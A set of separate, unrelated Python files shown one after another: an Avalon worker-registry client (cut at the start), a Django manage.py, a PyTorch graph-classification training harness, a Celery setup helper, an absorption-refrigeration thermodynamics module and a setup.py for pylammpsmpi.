the blockchain off_chain = False if options.registry_list: config["ethereum"]["direct_registry_contract_address"] = \ options.registry_list if options.service_uri: service_uri = options.service_uri off_chain = True if options.off_chain: service_uri = config["tcf"].get("json_rpc_uri") off_chain = True requester_signature = options.requester_signature verbose = options.verbose worker_id = options.worker_id # Initializing Worker Object worker_obj = worker.SGXWorkerDetails() def initialize_logging(config): """Initialize logging.""" if verbose: config["Logging"] = { "LogFile": "__screen__", "LogLevel": "INFO" } else: config["Logging"] = { "LogFile": "__screen__", "LogLevel": "WARN" } plogger.setup_loggers(config.get("Logging", {})) sys.stdout = plogger.stream_to_logger( logging.getLogger("STDOUT"), logging.DEBUG) sys.stderr = plogger.stream_to_logger( logging.getLogger("STDERR"), logging.WARN) def initialize_tcf(config): """Initialize Avalon: get Avalon worker instance.""" logger.info("***************** Avalon *****************") # Retrieve Worker Registry if not off_chain: registry_list_instance = direct_jrpc. \ get_worker_registry_list_instance() registry_count, lookup_tag, registry_list = \ registry_list_instance.registry_lookup() logger.info("\n Registry lookup response : registry count {}\ lookup tag {} registry list {}\n".format( registry_count, lookup_tag, registry_list )) if (registry_count == 0): logger.warn("No registries found") sys.exit(1) registry_retrieve_result = \ registry_list_instance.registry_retrieve( registry_list[0]) logger.info("\n Registry retrieve response : {}\n".format( registry_retrieve_result )) config["tcf"]["json_rpc_uri"] = registry_retrieve_result[0] # Prepare worker global worker_id if not worker_id: worker_registry_instance = direct_jrpc.get_worker_registry_instance() req_id = 31 worker_lookup_result = worker_registry_instance.worker_lookup( worker_type=WorkerType.TEE_SGX, id=req_id ) logger.info("\n Worker lookup response : {} \n".format( json.dumps(worker_lookup_result, indent=4) )) if "result" in worker_lookup_result and \ "ids" in worker_lookup_result["result"].keys(): if worker_lookup_result["result"]["totalCount"] != 0: worker_id = \ worker_lookup_result["result"]["ids"][0] else: logger.error("ERROR: No workers found") sys.exit(1) else: logger.error("ERROR: Failed to lookup worker") sys.exit(1) req_id += 1 worker = worker_registry_instance.worker_retrieve( worker_id, req_id ) logger.info("\n Worker retrieve response : {}\n".format( json.dumps(worker, indent=4) )) worker_obj.load_worker( worker ) logger.info("**********Worker details Updated with Worker ID" + "*********\n%s\n", worker_id) def main(args=None): """Entry point function.""" parse_command_line(args) initialize_logging(config) initialize_tcf(config) # Open GUI gui_main() # ----------------------------------------------------------------------------- main()
#!/usr/bin/env python # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import sys if __name__ == "__main__": os.environ.setdefault("DJANGO_SETTINGS_MODULE", "myoauth.settings") from django.core.management import execute_from_command_line execute_from_command_line(sys.argv)
import numpy as np import collections import numbers import torch import os from . import joint_network from .summary import LamanClassificationSummary from .. import corruption_dataset, model as mo from .representation import graph_to_rep, combine_graph_reps, encode_action, LamanRep, get_action_offsets from ..molecule_models import _train_utils, _train_harness from ._utils import cast_numpy_rec def _transform(graph, act): graph_rep = graph_to_rep(graph) act_encoded = encode_action(act, graph) act_coarse = act.action_type offset = torch.from_numpy(get_action_offsets(graph)).int() return { 'graph': graph_rep, 'label': act_encoded, 'label_coarse': act_coarse, 'label_offset': offset } def _collate(batch): graph = combine_graph_reps([b['graph'] for b in batch]) graph = cast_numpy_rec(graph) label_fine = torch.LongTensor([b['label'] for b in batch]) label_coarse = torch.LongTensor([b['label_coarse'] for b in batch]) offsets = torch.stack([b['label_offset'] for b in batch]) return {'graph': graph, 'label': label_fine, 'label_coarse': label_coarse, 'label_offset': offsets} def make_dataloader(dataset, batch_size=128, num_workers=2): return torch.utils.data.DataLoader( dataset, batch_size, shuffle=True, collate_fn=_collate, pin_memory=True, num_workers=num_workers) class LamanJointHarness(_train_harness.TrainingHarness): _keys = ['label', 'label_offset'] def __init__(self, model, optimizer, summary, task='train', profile=False): super(LamanJointHarness, self).__init__(model, optimizer, summary, task=task, profile=profile) def get_model_input(self, batch): graph = LamanRep.from_sequence(batch['graph']) return graph, def get_loss(self, model_output, batch): loss, summary_info = mo.classification.multi_classification_coarse_to_fine_loss( model_output, batch['label_coarse'], batch['label'], summary_info=True) self.summary.record_marginal_probability( torch.nn.functional.softmax(summary_info['coarse_logit'].detach(), dim=1).mean(dim=0)) return loss def record_step_summary(self, batch, model_output): logits_and_scopes = model_output prediction, label, label_offset = _train_harness.compute_and_aggregate_predictions( logits_and_scopes, batch, self._keys) if self.summary: self.summary.record_statistics(prediction, label, label_offset) def main(parameters=None): if parameters is None: parameters = {} task = parameters.get('task', 'train') batch_size = parameters.get('batch_size', 256) dataset_path = parameters.get('dataset_path') if dataset_path is None: dataset_path = '../data/laman/low_decomp_dataset_sample.pkl' dataset = corruption_dataset.LamanCorruptionDataset(dataset_path, transform=_transform) dataloader = make_dataloader(dataset, batch_size, num_workers=parameters.get('num_workers', 2)) config = joint_network.JointClassificationNetworkConfig( 5, message_size=256) model = joint_network.JointClassificationNetwork(config) if 'model_path' in parameters and parameters['model_path'] is not None: model.load_state_dict(torch.load(parameters['model_path'], map_location='cpu')) model = model.cuda() if task != 'train': model = model.eval() if task == 'train': optimizer, schedulers = _train_utils.init_optimizer(model, parameters) else: optimizer = None schedulers = [] summary = LamanClassificationSummary() harness = LamanJointHarness(model, optimizer, summary, task) harness.hooks.extend([ _train_harness.LogLossTimeHook(batch_size), _train_harness.PrintAccuracyHook(summary, None) ]) savedir = _train_utils.get_save_dir(parameters) for epoch in range(30): dataset.set_epoch(epoch) harness.set_epoch(epoch) if task == 'train': for scheduler in schedulers: scheduler.step() harness.train_epoch(dataloader) if task == 'train': torch.save( model.state_dict(), os.path.join(savedir, 'laman_joint_ep_{0}.pth'.format(epoch))) if __name__ == '__main__': args = _train_utils.parse_arguments() main(vars(args))
from celery import Celery def make_celery(app): celery = Celery( app.import_name, broker=app.config.get('CELERY_BROKER_URL', 'redis://localhost:6379') ) celery.conf.update(app.config) TaskBase = celery.Task class ContextTask(TaskBase): abstract = True def __call__(self, *args, **kwargs): with app.app_context(): return TaskBase.__call__(self, *args, **kwargs) celery.Task = ContextTask return celery
import numpy as np import matplotlib.pyplot as plt from sympy import solve, Eq, symbols import sys import pandas import math import os def degradeCOP(Tevap, Tcond, Qall, S): degraded = ((Tevap * Tcond)/(Tcond - Tevap)) * (S/Qall) return degraded # This function calculates the reversible COP of a ES refrigerator based on thermal reservoirs def reversibleCOP(Tevap, Tcond, Tgen): revCOP = (((Tgen - Tcond)/(Tgen))/((Tcond-Tevap)/Tevap)) return revCOP # This function solves the system of equations to calculate the mass flowrates of # the combined absorber-evaporator system def massabsorberevaporator(m6, m4, xa4, ya3, xa6): m3, m5= symbols(['m3', 'm5']) system = [ #Eq((xa4*m4)+ (ya3 * m3) - (0 * m5) - (xa6 * m6), 0), Eq(m5 - (1-ya3)*m3,0), Eq(m4 + m3 - m5 - m6, 0), #Eq((1-ya3)*m3-m5, 0) #Eq(m4 - (ya3*m3) - (m5) + (ya3 * m6), 0) ] soln = solve(system, [m4, m3, m5, m6]) return float(m4), float(soln[m3]), float(soln[m5]), float(m6) # This is an interpolate helper function to be used in other functions. # targetcomp refers to ammonia composition. All CSV files are in ammonia composition. def interpolateAW(targetcomp, T, var): # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in rel_path = 'data/mixed/' abs_file_path = os.path.join(script_dir, rel_path) colnames = ['pressure', 'ammoniacomp', 'prop'] propertyname = '' if var is 1: propertyname = 'enthalpy' else: propertyname = 'entropy' filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniawater' data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames) ammoniacomp = data.ammoniacomp.tolist() prop = data.prop.tolist() lower = prop[int(math.floor(targetcomp /0.05))] higher = prop[(int((math.floor(targetcomp /0.05))+1))] theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 ) return (theta * higher) + (1-theta)*lower def interpolateAB(targetcomp, T, var): # must use the entropy-ammonia-water csv, entropy-ammonia-butane csv, or enthalpy-ammonia-water csv script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in rel_path = 'data/mixed/' abs_file_path = os.path.join(script_dir, rel_path) colnames = ['pressure', 'ammoniacomp', 'prop'] propertyname = '' if var is 1: propertyname = 'enthalpy' else: propertyname = 'entropy' filename = propertyname + '-kjmol-' + str(T) + 'K-ammoniabutane' data = pandas.read_csv(str(abs_file_path) + '%s.csv' %filename, names=colnames) ammoniacomp = data.ammoniacomp.tolist() prop = data.prop.tolist() lower = prop[int(math.floor(targetcomp /0.05))] higher = prop[(int((math.floor(targetcomp /0.05))+1))] theta = (targetcomp - int(math.floor(targetcomp /0.05))*0.05 ) / ((int((math.floor(targetcomp /0.05))+1))*0.05 - int(math.floor(targetcomp /0.05))*0.05 ) return (theta * higher) + (1-theta)*lower # This calculates the two mass flowrates and the compositions coming out of the flash drum # given a mass flowrate and composition of ammonia coming in # inputcomp is the ammonia composition # temp is the temperature that the flash drum flashes at def leverrule(inputflow, temp, inputcomp): #t-xy of ammonia-water #input composition of ammonia script_dir = os.path.dirname(__file__) #<-- absolute dir the script is in rel_path = "data/txy/" abs_file_path = os.path.join(script_dir, rel_path) colnames = ['pressure', 'ammoniacomp', 'temperature', 'vaporwater', 'vaporammonia', 'liquidwater', 'liquidammonia'] filename = 'txy-ammonia-4bar' data = pandas.read_csv( str(abs_file_path) + '%s.csv' %filename, names = colnames) ammoniacomp = data.ammoniacomp.tolist() temperature = data.temperature.tolist() vaporammonia = data.vaporammonia.tolist() liquidammonia = data.liquidammonia.tolist() index, valuetemp = min(enumerate(temperature), key=lambda x: abs(x[1]-temp)) liquiddistance = inputcomp - liquidammonia[index] vapordistance = vaporammonia[index] - inputcomp vaporflow = symbols('vaporflow') system = [ Eq((vapordistance * vaporflow) + (-1.0*liquiddistance*(float(inputflow) - vaporflow)), 0) ] soln = solve(system, [vaporflow]) # the order is: vapor flow, liquid flow, liquid ammonia composition. vapor ammonia composition return soln[vaporflow], (inputflow - soln[vaporflow]) ,liquidammonia[index], vaporammonia[index] # This calculates the Q of the generator # compin is the ammonia composition def Qgenerator(massin, compin, Tgen): massout = massin enthalpyin = interpolateAW(compin, 325, 1 ) enthalpyout = interpolateAW(compin, Tgen, 1) Qgen = -1*(massin*enthalpyin - massout*enthalpyout) return Qgen # This calculates the S of the flash # compin is the ammonia flash def Sgenerator(massin, compin, Qgen, Tgen): massout = massin entropyin = interpolateAW(compin, 325, 2) #RAHUL fixed Line 95 - wrong entropy values read in entropyout = interpolateAW(compin, Tgen, 2) Sgen = symbols('Sgen') system = Eq((-1 * massin * entropyin ) + (massout*entropyout) + (Qgen/Tgen) - Sgen, 0) soln = solve([system], Sgen) return soln[Sgen] def Qflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Tgen): enthalpyin = interpolateAW( compin, Tgen, 1) enthalpyoutvapor = interpolateAW(vaporammonia, Tgen, 1) enthalpyoutliquid = interpolateAW( liquidammonia, Tgen, 1) Qflash = symbols('Qflash') system = Eq(( massin* enthalpyin ) + (-1* massvapor*enthalpyoutvapor) + (-1* massliquid*enthalpyoutliquid) + Qflash, 0) soln = solve([system], [Qflash]) return soln[Qflash] # This calculates the S of the flash # compin is the ammonia flash def Sflash(massin, massvapor, massliquid, compin, vaporammonia, liquidammonia, Qflash, Tgen): entropyin = interpolateAW( compin, Tgen, 2) entropyoutvapor = interpolateAW(vaporammonia, Tgen, 2) entropyoutliquid = interpolateAW(liquidammonia, Tgen, 2) Sflash = symbols('Sflash') system = Eq(( massin* entropyin ) + (-1* massvapor*entropyoutvapor) + (-1* massliquid*entropyoutliquid) + (Sflash/Tgen) - Qflash, 0) soln = solve([system], Sflash) return soln[Sflash] def Qevaporator(m2, m3, m5, ya3, ya2, xa5, Tgen): enthalpym2 = interpolateAW(ya2, Tgen, 1) enthalpym3 = interpolateAB( ya3, 266, 1) #print(enthalpym3) enthalpym5 = interpolateAB( xa5, 325, 1) #print(enthalpym5) # print(enthalpym2 + enthalpym3 + enthalpym5) Qevap = symbols('Qevap') system = Eq(( m2 * enthalpym2 ) + (-1* m3*enthalpym3) + (m5*enthalpym5) + Qevap, 0) soln = solve([system], Qevap) #print(type(soln)) return soln[Qevap] def Sevaporator(m2, m3, m5, ya3, ya2, xa5, Qevap, Tgen): entropym2 = interpolateAW(ya2, Tgen, 2) entropym3 = interpolateAB( ya3, 266, 2) entropym5 = interpolateAB( xa5, 325, 2) Sevap = symbols('Sevap') system = Eq(( m2 * entropym2 ) + (-1* m3*entropym3) + (m5*entropym5) + (Qevap/266) - Sevap, 0) soln = solve([system], Sevap) return soln[Sevap] def Qabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Tgen): enthalpym3 = interpolateAB( ya3, 266, 1) enthalpym4 = interpolateAW( xa4, Tgen, 1) enthalpym5 = interpolateAB(xa5, 325, 1) enthalpym6 = interpolateAW( xa6, 325, 1) Qabs = symbols('Qabs') system = (m3 * enthalpym3 ) + (m4 * enthalpym4) + (-1*m5 * enthalpym5) + (-1 * m6 * enthalpym6) + Qabs soln = solve([system], Qabs) return soln[Qabs] def Sabsorber(m3, m4, m5, m6, ya3, xa4, xa5, xa6, Qabs, Tgen): entropym3 = interpolateAB( ya3, 266, 2) entropym4 = interpolateAW( xa4, Tgen, 2) entropym5 = interpolateAB( xa5, 325, 2) entropym6 = interpolateAW(xa6, 325, 2) Sabs = symbols('Sabs') system = Eq((m3*entropym3) + (m4 * entropym4) + (-1*m5 * entropym5) + (-1*m6*entropym6) + (Qabs/325)- Sabs, 0) soln = solve([system], Sabs) return soln[Sabs]
from setuptools import setup, find_packages import versioneer setup( name="pylammpsmpi", version=versioneer.get_version(), description="Parallel Lammps Python interface", url='https://github.com/pyiron/pylammpsmpi', author='Jan Janssen', author_email='[email protected]', license='BSD', classifiers=['Development Status :: 5 - Production/Stable', 'Topic :: Scientific/Engineering :: Physics', 'License :: OSI Approved :: BSD License', 'Intended Audience :: Science/Research', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Programming Language :: Python :: 3.9' ], keywords='lammps, mpi4py', packages=find_packages(exclude=["*tests*"]), install_requires=[ 'mpi4py==3.1.3' ], cmdclass=versioneer.get_cmdclass(), )